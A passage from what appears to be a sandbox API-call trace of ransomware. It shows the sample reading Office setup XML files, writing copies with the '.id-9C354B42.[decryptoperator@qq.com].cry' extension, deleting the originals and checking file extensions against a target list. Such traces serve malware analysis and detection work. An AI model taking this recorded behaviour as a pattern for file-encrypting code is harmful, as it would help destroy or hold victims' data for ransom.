nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.252] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.252] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0041.252] SetEndOfFile (hFile=0x1cc) returned 1 [0041.252] CloseHandle (hObject=0x1cc) returned 1 [0041.253] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.253] SetEndOfFile (hFile=0x1bc) returned 1 [0041.253] CloseHandle (hObject=0x1bc) returned 1 [0041.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.254] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0041.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.254] lstrlenW (lpString=".doc") returned 4 [0041.254] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString=".docx") returned 5 [0041.254] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.254] lstrlenW (lpString=".pdf") returned 4 [0041.254] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString=".xls") returned 4 [0041.254] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString=".xlsx") returned 5 [0041.254] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.254] lstrlenW (lpString=".ppt") returned 4 [0041.254] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.254] lstrlenW (lpString=".zip") returned 4 [0041.254] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.254] lstrlenW (lpString=".rar") returned 4 [0041.254] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString=".bz2") returned 4 [0041.254] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString=".7z") returned 3 [0041.254] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.254] lstrlenW (lpString=".dbf") returned 4 [0041.254] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.254] lstrlenW (lpString=".1cd") returned 4 [0041.254] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".jpg") returned 4 [0041.255] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".doc") returned 4 [0041.255] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString=".docx") returned 5 [0041.255] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.255] lstrlenW (lpString=".pdf") returned 4 [0041.255] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString=".xls") returned 4 [0041.255] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString=".xlsx") returned 5 [0041.255] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.255] lstrlenW (lpString=".ppt") returned 4 [0041.255] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".zip") returned 4 [0041.255] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.255] lstrlenW (lpString=".rar") returned 4 [0041.255] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString=".bz2") returned 4 [0041.255] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString=".7z") returned 3 [0041.255] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".dbf") returned 4 [0041.255] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".1cd") returned 4 [0041.255] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.255] lstrlenW (lpString=".jpg") returned 4 [0041.255] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.256] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.256] lstrlenW (lpString="SETUP.XML") returned 9 [0041.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.257] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=6241) returned 1 [0041.257] CloseHandle (hObject=0x1bc) returned 1 [0041.257] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20 [0041.257] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.257] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.257] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0041.257] GetLastError () returned 0x0 [0041.257] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1861, lpOverlapped=0x0) returned 1 [0041.266] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1870, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.267] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.267] SetEndOfFile (hFile=0x1cc) returned 1 [0041.267] CloseHandle (hObject=0x1cc) returned 1 [0041.268] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.268] SetEndOfFile (hFile=0x1bc) returned 1 [0041.268] CloseHandle (hObject=0x1bc) returned 1 [0041.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.269] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.269] lstrlenW (lpString=".doc") returned 4 [0041.269] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".docx") returned 5 [0041.269] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.269] lstrlenW (lpString=".pdf") returned 4 [0041.269] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".xls") returned 4 [0041.269] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".xlsx") returned 5 [0041.269] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.269] lstrlenW (lpString=".ppt") returned 4 [0041.269] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.269] lstrlenW (lpString=".zip") returned 4 [0041.269] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.269] lstrlenW (lpString=".rar") returned 4 [0041.269] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".bz2") returned 4 [0041.269] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".7z") returned 3 [0041.269] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.269] lstrlenW (lpString=".dbf") returned 4 [0041.269] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.269] lstrlenW (lpString=".1cd") returned 4 [0041.269] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.270] lstrlenW (lpString=".jpg") returned 4 [0041.270] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.270] lstrlenW (lpString=".doc") returned 4 [0041.270] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString=".docx") returned 5 [0041.270] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.270] lstrlenW (lpString=".pdf") returned 4 [0041.270] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString=".xls") returned 4 [0041.270] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString=".xlsx") returned 5 [0041.270] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.270] lstrlenW (lpString=".ppt") returned 4 [0041.270] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.270] lstrlenW (lpString=".zip") returned 4 [0041.270] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.270] lstrlenW (lpString=".rar") returned 4 [0041.270] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString=".bz2") returned 4 [0041.270] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString=".7z") returned 3 [0041.270] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.270] lstrlenW (lpString=".dbf") returned 4 [0041.270] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.271] lstrlenW (lpString=".1cd") returned 4 [0041.271] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.271] lstrlenW (lpString=".jpg") returned 4 [0041.271] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.271] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.271] lstrlenW (lpString="VisioMUI.XML") returned 12 [0041.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.272] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=9503) returned 1 [0041.272] CloseHandle (hObject=0x1bc) returned 1 [0041.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20 [0041.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.272] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.272] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0041.273] GetLastError () returned 0x0 [0041.273] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x251f, lpOverlapped=0x0) returned 1 [0041.276] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2520, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.276] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.277] SetEndOfFile (hFile=0x1cc) returned 1 [0041.277] CloseHandle (hObject=0x1cc) returned 1 [0041.277] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.277] SetEndOfFile (hFile=0x1bc) returned 1 [0041.278] CloseHandle (hObject=0x1bc) returned 1 [0041.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.278] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0041.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.278] lstrlenW (lpString=".doc") returned 4 [0041.278] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.278] lstrlenW (lpString=".docx") returned 5 [0041.278] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.278] lstrlenW (lpString=".pdf") returned 4 [0041.278] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".xls") returned 4 [0041.279] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".xlsx") returned 5 [0041.279] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.279] lstrlenW (lpString=".ppt") returned 4 [0041.279] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString=".zip") returned 4 [0041.279] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.279] lstrlenW (lpString=".rar") returned 4 [0041.279] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".bz2") returned 4 [0041.279] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".7z") returned 3 [0041.279] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString=".dbf") returned 4 [0041.279] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString=".1cd") returned 4 [0041.279] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString=".jpg") returned 4 [0041.279] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.279] lstrlenW (lpString=".doc") returned 4 [0041.279] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".docx") returned 5 [0041.279] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.279] lstrlenW (lpString=".pdf") returned 4 [0041.279] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".xls") returned 4 [0041.279] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString=".xlsx") returned 5 [0041.279] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.279] lstrlenW (lpString=".ppt") returned 4 [0041.279] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.280] lstrlenW (lpString=".zip") returned 4 [0041.280] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.280] lstrlenW (lpString=".rar") returned 4 [0041.280] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.280] lstrlenW (lpString=".bz2") returned 4 [0041.280] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.280] lstrlenW (lpString=".7z") returned 3 [0041.280] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.280] lstrlenW (lpString=".dbf") returned 4 [0041.280] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.280] lstrlenW (lpString=".1cd") returned 4 [0041.280] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.280] lstrlenW (lpString=".jpg") returned 4 [0041.280] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.280] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.280] lstrlenW (lpString="SETUP.XML") returned 9 [0041.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.283] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=20577) returned 1 [0041.283] CloseHandle (hObject=0x1bc) returned 1 [0041.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20 [0041.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 